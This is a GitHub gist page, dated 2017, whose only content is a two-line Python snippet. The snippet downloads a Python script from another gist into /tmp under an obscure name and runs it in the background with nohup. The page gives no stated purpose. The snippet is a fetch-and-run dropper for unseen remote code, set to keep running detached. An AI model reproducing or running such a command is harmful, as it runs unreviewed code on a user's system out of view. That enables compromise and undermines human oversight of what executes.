Skip to content

Instantly share code, notes, and snippets.

@arshtepe
Created August 4, 2017 15:24
Show Gist options
  • Save arshtepe/975bc86ba66d70da60a89b951172c2fa to your computer and use it in GitHub Desktop.
Save arshtepe/975bc86ba66d70da60a89b951172c2fa to your computer and use it in GitHub Desktop.
import subprocess
subprocess.check_output("wget https://gist.githubusercontent.com/arshtepe/2eb8ebb2f4ef335df64d49bef5f4fa05/raw -O /tmp/xs999.py && nohup python /tmp/xs999.py &", shell=True)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment